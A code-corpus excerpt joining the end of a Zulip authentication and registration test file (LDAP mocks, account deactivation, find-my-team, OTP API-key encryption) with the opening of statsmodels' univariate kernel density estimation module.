account is created if it doesn't already exist).
This test verifies that flow.
"""
password = "testing"
email = "newuser@zulip.com"
subdomain = "zulip"
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
ldap_patcher = patch('django_auth_ldap.config.ldap.initialize')
mock_initialize = ldap_patcher.start()
mock_ldap = MockLDAP()
mock_initialize.return_value = mock_ldap
full_name = 'New LDAP fullname'
mock_ldap.directory = {
'uid=newuser,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing',
'fn': [full_name],
'sn': ['shortname'],
}
}
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
self.login_with_return(email, password,
HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(email=email)
# Name comes from form which was set by LDAP.
self.assertEqual(user_profile.full_name, full_name)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_registration_when_names_changes_are_disabled(self):
# type: () -> None
password = "testing"
email = "newuser@zulip.com"
subdomain = "zulip"
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
ldap_patcher = patch('django_auth_ldap.config.ldap.initialize')
mock_initialize = ldap_patcher.start()
mock_ldap = MockLDAP()
mock_initialize.return_value = mock_ldap
mock_ldap.directory = {
'uid=newuser,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing',
'fn': ['New LDAP fullname'],
'sn': ['New LDAP shortname'],
}
}
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
            # Click confirmation link. This will set the 'authenticated_full_name'
            # session variable, which will be used to set the full name of
            # the user.
result = self.submit_reg_form_for_user(email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
with patch('zerver.views.registration.name_changes_disabled', return_value=True):
result = self.submit_reg_form_for_user(email,
password,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(email=email)
# Name comes from LDAP session.
self.assertEqual(user_profile.full_name, 'New LDAP fullname')
def test_registration_when_name_changes_are_disabled(self):
# type: () -> None
"""
Test `name_changes_disabled` when we are not running under LDAP.
"""
password = "testing"
email = "newuser@zulip.com"
subdomain = "zulip"
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with patch('zerver.views.registration.name_changes_disabled', return_value=True):
result = self.submit_reg_form_for_user(email,
password,
full_name="New Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(email=email)
# 'New Name' comes from POST data; not from LDAP session.
self.assertEqual(user_profile.full_name, 'New Name')
def test_realm_creation_through_ldap(self):
# type: () -> None
password = "testing"
email = "newuser@zulip.com"
subdomain = "zulip"
realm_name = "Zulip"
ldap_user_attr_map = {'full_name': 'fn', 'short_name': 'sn'}
ldap_patcher = patch('django_auth_ldap.config.ldap.initialize')
mock_initialize = ldap_patcher.start()
mock_ldap = MockLDAP()
mock_initialize.return_value = mock_ldap
mock_ldap.directory = {
'uid=newuser,ou=users,dc=zulip,dc=com': {
'userPassword': 'testing',
'fn': ['New User Name']
}
}
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
                confirmation_link_pattern = re.compile(settings.EXTERNAL_HOST + r"(\S+)>")
confirmation_url = confirmation_link_pattern.search(
message.body).groups()[0]
break
else:
raise AssertionError("Couldn't find a confirmation email.")
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',),
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com',
TERMS_OF_SERVICE=False,
):
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
            key = find_key_by_email(email)
            confirmation = Confirmation.objects.get(confirmation_key=key)
prereg_user = confirmation.content_object
prereg_user.realm_creation = True
prereg_user.save()
result = self.submit_reg_form_for_user(email,
password,
realm_name=realm_name,
realm_subdomain=subdomain,
from_confirmation='1',
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assert_in_success_response(["You're almost there.",
"newuser@zulip.com"],
result)
mock_ldap.reset()
mock_initialize.stop()
@patch('DNS.dnslookup', return_value=[['sipbtest:*:20922:101:Fred Sipb,,,:/mit/sipbtest:/bin/athena/tcsh']])
def test_registration_of_mirror_dummy_user(self, ignored):
# type: (Any) -> None
password = "test"
subdomain = "zephyr"
user_profile = self.mit_user("sipbtest")
email = user_profile.email
user_profile.is_mirror_dummy = True
user_profile.is_active = False
user_profile.save()
result = self.client_post('/register/', {'email': email}, subdomain="zephyr")
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/send_confirm/%s" % (email,)))
result = self.client_get(result["Location"], subdomain="zephyr")
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
                confirmation_link_pattern = re.compile(settings.EXTERNAL_HOST + r"(\S+)>")
confirmation_url = confirmation_link_pattern.search(
message.body).groups()[0]
break
else:
raise AssertionError("Couldn't find a confirmation email.")
result = self.client_get(confirmation_url, subdomain="zephyr")
self.assertEqual(result.status_code, 200)
# If the mirror dummy user is already active, attempting to submit the
# registration form should just redirect to a login page.
user_profile.is_active = True
user_profile.save()
result = self.submit_reg_form_for_user(email,
password,
from_confirmation='1',
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 302)
self.assertIn('login', result['Location'])
user_profile.is_active = False
user_profile.save()
result = self.submit_reg_form_for_user(email,
password,
from_confirmation='1',
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email,
password,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 302)
self.assertEqual(get_session_dict_user(self.client.session), user_profile.id)
def test_registration_of_active_mirror_dummy_user(self):
        # type: () -> None
"""
Trying to activate an already-active mirror dummy user should just
redirect to a login page.
"""
user_profile = self.mit_user("sipbtest")
email = user_profile.email
user_profile.is_mirror_dummy = True
user_profile.is_active = True
user_profile.save()
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertIn('login', result['Location'])
class DeactivateUserTest(ZulipTestCase):
def test_deactivate_user(self):
# type: () -> None
email = self.example_email("hamlet")
self.login(email)
user = self.example_user('hamlet')
self.assertTrue(user.is_active)
result = self.client_delete('/json/users/me')
self.assert_json_success(result)
user = self.example_user('hamlet')
self.assertFalse(user.is_active)
self.login(email, fails=True)
def test_do_not_deactivate_final_admin(self):
# type: () -> None
email = self.example_email("iago")
self.login(email)
user = self.example_user('iago')
self.assertTrue(user.is_active)
result = self.client_delete('/json/users/me')
self.assert_json_error(result, "Cannot deactivate the only organization administrator")
user = self.example_user('iago')
self.assertTrue(user.is_active)
self.assertTrue(user.is_realm_admin)
email = self.example_email("hamlet")
user_2 = self.example_user('hamlet')
do_change_is_admin(user_2, True)
self.assertTrue(user_2.is_realm_admin)
result = self.client_delete('/json/users/me')
self.assert_json_success(result)
do_change_is_admin(user, True)
class TestLoginPage(ZulipTestCase):
def test_login_page_wrong_subdomain_error(self):
# type: () -> None
result = self.client_get("/login/?subdomain=1")
self.assertIn(WRONG_SUBDOMAIN_ERROR, result.content.decode('utf8'))
@patch('django.http.HttpRequest.get_host')
def test_login_page_redirects_for_root_alias(self, mock_get_host):
# type: (MagicMock) -> None
mock_get_host.return_value = 'www.testserver'
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/')
@patch('django.http.HttpRequest.get_host')
def test_login_page_redirects_for_root_domain(self, mock_get_host):
# type: (MagicMock) -> None
mock_get_host.return_value = 'testserver'
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/')
mock_get_host.return_value = 'www.testserver.com'
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True,
EXTERNAL_HOST='www.testserver.com',
ROOT_SUBDOMAIN_ALIASES=['test']):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/')
@patch('django.http.HttpRequest.get_host')
def test_login_page_works_without_subdomains(self, mock_get_host):
# type: (MagicMock) -> None
mock_get_host.return_value = 'www.testserver'
with self.settings(ROOT_SUBDOMAIN_ALIASES=['www']):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 200)
mock_get_host.return_value = 'testserver'
with self.settings(ROOT_SUBDOMAIN_ALIASES=['www']):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 200)
class TestFindMyTeam(ZulipTestCase):
def test_template(self):
# type: () -> None
result = self.client_get('/accounts/find/')
self.assertIn("Find your Zulip accounts", result.content.decode('utf8'))
def test_result(self):
# type: () -> None
result = self.client_post('/accounts/find/',
dict(emails="iago@zulip.com,cordelia@zulip.com"))
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/find/?emails=iago%40zulip.com%2Ccordelia%40zulip.com")
result = self.client_get(result.url)
content = result.content.decode('utf8')
self.assertIn("Emails sent! You will only receive emails", content)
self.assertIn(self.example_email("iago"), content)
self.assertIn(self.example_email("cordelia"), content)
from django.core.mail import outbox
self.assertEqual(len(outbox), 2)
def test_find_team_ignore_invalid_email(self):
# type: () -> None
result = self.client_post('/accounts/find/',
dict(emails="iago@zulip.com,invalid_email@zulip.com"))
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/find/?emails=iago%40zulip.com%2Cinvalid_email%40zulip.com")
result = self.client_get(result.url)
content = result.content.decode('utf8')
self.assertIn("Emails sent! You will only receive emails", content)
self.assertIn(self.example_email("iago"), content)
self.assertIn("invalid_email@", content)
from django.core.mail import outbox
self.assertEqual(len(outbox), 1)
def test_find_team_reject_invalid_email(self):
# type: () -> None
result = self.client_post('/accounts/find/',
dict(emails="invalid_string"))
self.assertEqual(result.status_code, 200)
self.assertIn(b"Enter a valid email", result.content)
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
# Just for coverage on perhaps-unnecessary validation code.
result = self.client_get('/accounts/find/?emails=invalid')
self.assertEqual(result.status_code, 200)
def test_find_team_zero_emails(self):
# type: () -> None
data = {'emails': ''}
result = self.client_post('/accounts/find/', data)
self.assertIn('This field is required', result.content.decode('utf8'))
self.assertEqual(result.status_code, 200)
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
def test_find_team_one_email(self):
# type: () -> None
data = {'emails': self.example_email("hamlet")}
result = self.client_post('/accounts/find/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/?emails=hamlet%40zulip.com')
from django.core.mail import outbox
self.assertEqual(len(outbox), 1)
def test_find_team_deactivated_user(self):
# type: () -> None
do_deactivate_user(self.example_user("hamlet"))
data = {'emails': self.example_email("hamlet")}
result = self.client_post('/accounts/find/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/?emails=hamlet%40zulip.com')
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
def test_find_team_deactivated_realm(self):
# type: () -> None
do_deactivate_realm(get_realm("zulip"))
data = {'emails': self.example_email("hamlet")}
result = self.client_post('/accounts/find/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/?emails=hamlet%40zulip.com')
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
def test_find_team_bot_email(self):
# type: () -> None
data = {'emails': self.example_email("webhook_bot")}
result = self.client_post('/accounts/find/', data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, '/accounts/find/?emails=webhook-bot%40zulip.com')
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
def test_find_team_more_than_ten_emails(self):
# type: () -> None
data = {'emails': ','.join(['hamlet-{}@zulip.com'.format(i) for i in range(11)])}
result = self.client_post('/accounts/find/', data)
self.assertEqual(result.status_code, 200)
self.assertIn("Please enter at most 10", result.content.decode('utf8'))
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
class ConfirmationKeyTest(ZulipTestCase):
def test_confirmation_key(self):
# type: () -> None
request = MagicMock()
request.session = {
'confirmation_key': {'confirmation_key': 'xyzzy'}
}
result = confirmation_key(request)
self.assert_json_success(result)
self.assert_in_response('xyzzy', result)
class MobileAuthOTPTest(ZulipTestCase):
def test_xor_hex_strings(self):
# type: () -> None
self.assertEqual(xor_hex_strings('1237c81ab', '18989fd12'), '0aaf57cb9')
with self.assertRaises(AssertionError):
xor_hex_strings('1', '31')
def test_is_valid_otp(self):
# type: () -> None
self.assertEqual(is_valid_otp('1234'), False)
self.assertEqual(is_valid_otp('1234abcd' * 8), True)
self.assertEqual(is_valid_otp('1234abcZ' * 8), False)
def test_ascii_to_hex(self):
# type: () -> None
self.assertEqual(ascii_to_hex('ZcdR1234'), '5a63645231323334')
self.assertEqual(hex_to_ascii('5a63645231323334'), 'ZcdR1234')
def test_otp_encrypt_api_key(self):
# type: () -> None
hamlet = self.example_user('hamlet')
hamlet.api_key = '12ac' * 8
otp = '7be38894' * 8
result = otp_encrypt_api_key(hamlet, otp)
self.assertEqual(result, '4ad1e9f7' * 8)
        decrypted = otp_decrypt_api_key(result, otp)
        self.assertEqual(decrypted, hamlet.api_key)
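    # Editor's sketch of the arithmetic exercised above (illustrative only;
    # `_toy_otp_encrypt` is a hypothetical helper, not part of the Zulip
    # codebase): the API key is hex-encoded byte-by-byte and XORed with the
    # one-time pad, so applying the same operation twice recovers the key.
    #
    #   def _toy_otp_encrypt(api_key, otp):
    #       hex_key = ''.join('%02x' % ord(c) for c in api_key)
    #       return xor_hex_strings(hex_key, otp)
    #
    # For the values above: '12ac' hex-encodes to '31326163', and
    # '31326163' XOR '7be38894' == '4ad1e9f7', which is why the expected
    # ciphertext is '4ad1e9f7' * 8.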
class LoginOrAskForRegistrationTestCase(ZulipTestCase):
def test_confirm(self):
# type: () -> None
request = HostRequestMock()
email = 'new@zulip.com'
user_profile = None # type: Optional[UserProfile]
full_name = 'New User'
invalid_subdomain = False
result = login_or_register_remote_user(
request,
email,
user_profile,
full_name=full_name,
invalid_subdomain=invalid_subdomain)
self.assert_in_response('No account found for',
result)
self.assert_in_response('new@zulip.com. Would you like to register instead?',
result)
def test_invalid_subdomain(self):
# type: () -> None
request = HostRequestMock()
email = 'new@zulip.com'
user_profile = None # type: Optional[UserProfile]
full_name = 'New User'
invalid_subdomain = True
response = login_or_register_remote_user(
request,
email,
user_profile,
full_name=full_name,
invalid_subdomain=invalid_subdomain)
self.assertEqual(response.status_code, 302)
self.assertIn('/accounts/login/?subdomain=1', response.url)
def test_invalid_email(self):
# type: () -> None
request = HostRequestMock()
email = None # type: Optional[Text]
user_profile = None # type: Optional[UserProfile]
full_name = 'New User'
invalid_subdomain = False
response = login_or_register_remote_user(
request,
email,
user_profile,
full_name=full_name,
invalid_subdomain=invalid_subdomain)
self.assert_in_response('Please click the following button if '
'you wish to register', response)
def test_login_under_subdomains(self):
# type: () -> None
request = HostRequestMock()
setattr(request, 'session', self.client.session)
user_profile = self.example_user('hamlet')
user_profile.backend = 'zproject.backends.GitHubAuthBackend'
full_name = 'Hamlet'
invalid_subdomain = False
response = login_or_register_remote_user(
request,
user_profile.email,
user_profile,
full_name=full_name,
invalid_subdomain=invalid_subdomain)
user_id = get_session_dict_user(getattr(request, 'session'))
self.assertEqual(user_id, user_profile.id)
self.assertEqual(response.status_code, 302)
self.assertIn('http://zulip.testserver', response.url)
| 43.144387
| 114
| 0.615676
|
2658b95c4370ce6c5bbd24abe6c558ae24902a26
| 18,447
|
py
|
Python
|
statsmodels/nonparametric/kde.py
|
ginggs/statsmodels
|
a74a179d2a3267ed992871f8d9ef6c6d86c9b934
|
[
"BSD-3-Clause"
] | 6
|
2019-12-26T08:34:44.000Z
|
2021-05-05T03:10:06.000Z
|
statsmodels/nonparametric/kde.py
|
ginggs/statsmodels
|
a74a179d2a3267ed992871f8d9ef6c6d86c9b934
|
[
"BSD-3-Clause"
] | 1
|
2019-07-29T08:35:08.000Z
|
2019-07-29T08:35:08.000Z
|
statsmodels/nonparametric/kde.py
|
ginggs/statsmodels
|
a74a179d2a3267ed992871f8d9ef6c6d86c9b934
|
[
"BSD-3-Clause"
] | 4
|
2020-04-07T00:06:17.000Z
|
2021-06-17T15:11:36.000Z
|
"""
Univariate Kernel Density Estimators
References
----------
Racine, Jeff. (2008) "Nonparametric Econometrics: A Primer," Foundation and
Trends in Econometrics: Vol 3: No 1, pp1-88.
http://dx.doi.org/10.1561/0800000009
https://en.wikipedia.org/wiki/Kernel_%28statistics%29
Silverman, B.W. Density Estimation for Statistics and Data Analysis.
"""
import numpy as np
from scipy import integrate, stats
from statsmodels.sandbox.nonparametric import kernels
from statsmodels.tools.decorators import cache_readonly
from . import bandwidths
from .kdetools import (forrt, revrt, silverman_transform)
from .linbin import fast_linbin
#### Kernels Switch for estimators ####
kernel_switch = dict(gau=kernels.Gaussian, epa=kernels.Epanechnikov,
uni=kernels.Uniform, tri=kernels.Triangular,
biw=kernels.Biweight, triw=kernels.Triweight,
cos=kernels.Cosine, cos2=kernels.Cosine2)
def _checkisfit(self):
try:
self.density
    except AttributeError:
raise ValueError("Call fit to fit the density first")
#### Kernel Density Estimator Class ###
class KDEUnivariate(object):
"""
Univariate Kernel Density Estimator.
Parameters
----------
endog : array_like
The variable for which the density estimate is desired.
Notes
-----
If cdf, sf, cumhazard, or entropy are computed, they are computed based on
the definition of the kernel rather than the FFT approximation, even if
the density is fit with FFT = True.
`KDEUnivariate` is much faster than `KDEMultivariate`, due to its FFT-based
implementation. It should be preferred for univariate, continuous data.
`KDEMultivariate` also supports mixed data.
See Also
--------
KDEMultivariate
kdensity, kdensityfft
Examples
--------
    >>> import numpy as np
    >>> import statsmodels.api as sm
>>> import matplotlib.pyplot as plt
>>> nobs = 300
>>> np.random.seed(1234) # Seed random generator
>>> dens = sm.nonparametric.KDEUnivariate(np.random.normal(size=nobs))
>>> dens.fit()
>>> plt.plot(dens.cdf)
>>> plt.show()
"""
def __init__(self, endog):
self.endog = np.asarray(endog)
def fit(self, kernel="gau", bw="normal_reference", fft=True, weights=None,
gridsize=None, adjust=1, cut=3, clip=(-np.inf, np.inf)):
"""
Attach the density estimate to the KDEUnivariate class.
Parameters
----------
kernel : str
The Kernel to be used. Choices are:
- "biw" for biweight
- "cos" for cosine
- "epa" for Epanechnikov
- "gau" for Gaussian.
- "tri" for triangular
- "triw" for triweight
- "uni" for uniform
bw : str, float
The bandwidth to use. Choices are:
- "scott" - 1.059 * A * nobs ** (-1/5.), where A is
`min(std(X),IQR/1.34)`
- "silverman" - .9 * A * nobs ** (-1/5.), where A is
`min(std(X),IQR/1.34)`
- "normal_reference" - C * A * nobs ** (-1/5.), where C is
calculated from the kernel. Equivalent (up to 2 dp) to the
"scott" bandwidth for gaussian kernels. See bandwidths.py
- If a float is given, it is the bandwidth.
fft : bool
Whether or not to use FFT. FFT implementation is more
computationally efficient. However, only the Gaussian kernel
is implemented. If FFT is False, then a 'nobs' x 'gridsize'
intermediate array is created.
gridsize : int
If gridsize is None, max(len(X), 50) is used.
cut : float
Defines the length of the grid past the lowest and highest values
of X so that the kernel goes to zero. The end points are
-/+ cut*bw*{min(X) or max(X)}
adjust : float
An adjustment factor for the bw. Bandwidth becomes bw * adjust.
"""
try:
bw = float(bw)
self.bw_method = "user-given"
        except (ValueError, TypeError):
self.bw_method = bw
endog = self.endog
if fft:
if kernel != "gau":
msg = "Only gaussian kernel is available for fft"
raise NotImplementedError(msg)
if weights is not None:
msg = "Weights are not implemented for fft"
raise NotImplementedError(msg)
density, grid, bw = kdensityfft(endog, kernel=kernel, bw=bw,
adjust=adjust, weights=weights, gridsize=gridsize,
clip=clip, cut=cut)
else:
density, grid, bw = kdensity(endog, kernel=kernel, bw=bw,
adjust=adjust, weights=weights, gridsize=gridsize,
clip=clip, cut=cut)
self.density = density
self.support = grid
self.bw = bw
self.kernel = kernel_switch[kernel](h=bw) # we instantiate twice,
        # should this be passed to funcs?
# put here to ensure empty cache after re-fit with new options
self.kernel.weights = weights
if weights is not None:
self.kernel.weights /= weights.sum()
self._cache = {}
@cache_readonly
def cdf(self):
"""
Returns the cumulative distribution function evaluated at the support.
Notes
-----
Will not work if fit has not been called.
"""
_checkisfit(self)
kern = self.kernel
if kern.domain is None: # TODO: test for grid point at domain bound
a,b = -np.inf,np.inf
else:
a,b = kern.domain
func = lambda x,s: kern.density(s,x)
support = self.support
support = np.r_[a,support]
gridsize = len(support)
endog = self.endog
probs = [integrate.quad(func, support[i - 1], support[i],
args=endog)[0] for i in range(1, gridsize)]
return np.cumsum(probs)
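    # Editor's note (sketch of what the method above computes): each quad call
    # integrates the fitted kernel density over one grid cell, and the
    # cumulative sum turns those cell masses into CDF values, i.e.
    #     cdf[k] ~= integral from a to support[k + 1] of f_hat(t) dt,
    # so the last entry should be close to 1 when `cut` is large enough that
    # the support covers essentially all of the probability mass.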
@cache_readonly
def cumhazard(self):
"""
Returns the hazard function evaluated at the support.
Notes
-----
Will not work if fit has not been called.
"""
_checkisfit(self)
return -np.log(self.sf)
@cache_readonly
def sf(self):
"""
Returns the survival function evaluated at the support.
Notes
-----
Will not work if fit has not been called.
"""
_checkisfit(self)
return 1 - self.cdf
@cache_readonly
def entropy(self):
"""
Returns the differential entropy evaluated at the support
Notes
-----
Will not work if fit has not been called. 1e-12 is added to each
probability to ensure that log(0) is not called.
"""
_checkisfit(self)
def entr(x,s):
pdf = kern.density(s,x)
return pdf*np.log(pdf+1e-12)
kern = self.kernel
if kern.domain is not None:
            a, b = kern.domain
else:
a, b = -np.inf, np.inf
endog = self.endog
#TODO: below could run into integr problems, cf. stats.dist._entropy
return -integrate.quad(entr, a, b, args=(endog,))[0]
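    # Editor's note (sketch): the quantity returned above is the differential
    # entropy of the fitted density,
    #     H(f_hat) = - integral of f_hat(x) * log(f_hat(x)) dx,
    # evaluated by quadrature over the kernel's domain (or the whole real line
    # for unbounded kernels), with 1e-12 added inside the log for numerical
    # safety when f_hat(x) is zero.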
@cache_readonly
def icdf(self):
"""
Inverse Cumulative Distribution (Quantile) Function
Notes
-----
Will not work if fit has not been called. Uses
`scipy.stats.mstats.mquantiles`.
"""
_checkisfit(self)
gridsize = len(self.density)
return stats.mstats.mquantiles(self.endog, np.linspace(0, 1, gridsize))
def evaluate(self, point):
"""
Evaluate density at a single point.
Parameters
----------
point : float
Point at which to evaluate the density.
"""
_checkisfit(self)
return self.kernel.density(self.endog, point)
#### Kernel Density Estimator Functions ####
def kdensity(X, kernel="gau", bw="normal_reference", weights=None, gridsize=None,
adjust=1, clip=(-np.inf, np.inf), cut=3, retgrid=True):
"""
Rosenblatt-Parzen univariate kernel density estimator.
Parameters
----------
X : array_like
The variable for which the density estimate is desired.
kernel : str
The Kernel to be used. Choices are
- "biw" for biweight
- "cos" for cosine
- "epa" for Epanechnikov
- "gau" for Gaussian.
- "tri" for triangular
- "triw" for triweight
- "uni" for uniform
bw : str, float
"scott" - 1.059 * A * nobs ** (-1/5.), where A is min(std(X),IQR/1.34)
"silverman" - .9 * A * nobs ** (-1/5.), where A is min(std(X),IQR/1.34)
If a float is given, it is the bandwidth.
weights : array or None
Optional weights. If the X value is clipped, then this weight is
also dropped.
gridsize : int
If gridsize is None, max(len(X), 50) is used.
adjust : float
An adjustment factor for the bw. Bandwidth becomes bw * adjust.
clip : tuple
Observations in X that are outside of the range given by clip are
dropped. The number of observations in X is then shortened.
cut : float
Defines the length of the grid past the lowest and highest values of X
so that the kernel goes to zero. The end points are
-/+ cut*bw*{min(X) or max(X)}
retgrid : bool
Whether or not to return the grid over which the density is estimated.
Returns
-------
density : array
The densities estimated at the grid points.
grid : array, optional
The grid points at which the density is estimated.
Notes
-----
Creates an intermediate (`gridsize` x `nobs`) array. Use FFT for a more
computationally efficient version.
"""
X = np.asarray(X)
if X.ndim == 1:
X = X[:, None]
clip_x = np.logical_and(X > clip[0], X < clip[1])
X = X[clip_x]
nobs = len(X) # after trim
if gridsize is None:
gridsize = max(nobs,50) # do not need to resize if no FFT
# handle weights
if weights is None:
weights = np.ones(nobs)
q = nobs
else:
# ensure weights is a numpy array
weights = np.asarray(weights)
if len(weights) != len(clip_x):
msg = "The length of the weights must be the same as the given X."
raise ValueError(msg)
weights = weights[clip_x.squeeze()]
q = weights.sum()
# Get kernel object corresponding to selection
kern = kernel_switch[kernel]()
# if bw is None, select optimal bandwidth for kernel
try:
bw = float(bw)
    except (ValueError, TypeError):
bw = bandwidths.select_bandwidth(X, bw, kern)
bw *= adjust
a = np.min(X, axis=0) - cut * bw
b = np.max(X, axis=0) + cut * bw
grid = np.linspace(a, b, gridsize)
k = (X.T - grid[:, None])/bw # uses broadcasting to make a gridsize x nobs
# set kernel bandwidth
kern.seth(bw)
# truncate to domain
if kern.domain is not None: # will not work for piecewise kernels like parzen
z_lo, z_high = kern.domain
domain_mask = (k < z_lo) | (k > z_high)
k = kern(k) # estimate density
k[domain_mask] = 0
else:
k = kern(k) # estimate density
k[k < 0] = 0 # get rid of any negative values, do we need this?
dens = np.dot(k, weights)/(q*bw)
if retgrid:
return dens, grid, bw
else:
return dens, bw
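# Editor's addition: a slow reference implementation (sketch) for checking
# `kdensity`; the name `_kdensity_naive` is hypothetical and nothing else in
# this module calls it.
def _kdensity_naive(X, grid, bw, kern, weights):
    """Editor's sketch, not part of the statsmodels API.
    Direct O(gridsize * nobs) evaluation of the weighted Rosenblatt-Parzen
    estimator, f_hat(g) = sum_i w_i * K((X_i - g) / bw) / (sum_i w_i * bw),
    intended only as a cross-check of `kdensity` for symmetric kernels.
    Assumes X is 1-D, weights has the same length as X, and `kern` is a
    kernel object from `kernel_switch` with its bandwidth already set.
    """
    out = np.empty(len(grid))
    q = weights.sum()
    for j, g in enumerate(grid):
        # same scaling as the vectorized code above; for symmetric kernels
        # the sign of (X - g) does not matter
        out[j] = np.dot(kern((X - g) / bw), weights) / (q * bw)
    return out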
def kdensityfft(X, kernel="gau", bw="normal_reference", weights=None, gridsize=None,
adjust=1, clip=(-np.inf, np.inf), cut=3, retgrid=True):
"""
Rosenblatt-Parzen univariate kernel density estimator
Parameters
----------
X : array_like
The variable for which the density estimate is desired.
kernel : str
ONLY GAUSSIAN IS CURRENTLY IMPLEMENTED.
"bi" for biweight
"cos" for cosine
"epa" for Epanechnikov, default
"epa2" for alternative Epanechnikov
"gau" for Gaussian.
"par" for Parzen
"rect" for rectangular
"tri" for triangular
bw : str, float
"scott" - 1.059 * A * nobs ** (-1/5.), where A is min(std(X),IQR/1.34)
"silverman" - .9 * A * nobs ** (-1/5.), where A is min(std(X),IQR/1.34)
If a float is given, it is the bandwidth.
weights : array or None
WEIGHTS ARE NOT CURRENTLY IMPLEMENTED.
Optional weights. If the X value is clipped, then this weight is
also dropped.
gridsize : int
If gridsize is None, min(len(X), 512) is used. Note that the provided
number is rounded up to the next highest power of 2.
adjust : float
An adjustment factor for the bw. Bandwidth becomes bw * adjust.
clip : tuple
Observations in X that are outside of the range given by clip are
dropped. The number of observations in X is then shortened.
cut : float
Defines the length of the grid past the lowest and highest values of X
so that the kernel goes to zero. The end points are
-/+ cut*bw*{X.min() or X.max()}
retgrid : bool
Whether or not to return the grid over which the density is estimated.
Returns
-------
density : array
The densities estimated at the grid points.
grid : array, optional
The grid points at which the density is estimated.
Notes
-----
Only the default kernel is implemented. Weights are not implemented yet.
This follows Silverman (1982) with changes suggested by Jones and Lotwick
(1984). However, the discretization step is replaced by linear binning
of Fan and Marron (1994). This should be extended to accept the parts
that are dependent only on the data to speed things up for
cross-validation.
References
----------
Fan, J. and J.S. Marron. (1994) `Fast implementations of nonparametric
curve estimators`. Journal of Computational and Graphical Statistics.
3.1, 35-56.
Jones, M.C. and H.W. Lotwick. (1984) `Remark AS R50: A Remark on Algorithm
    AS 176. Kernel Density Estimation Using the Fast Fourier Transform`.
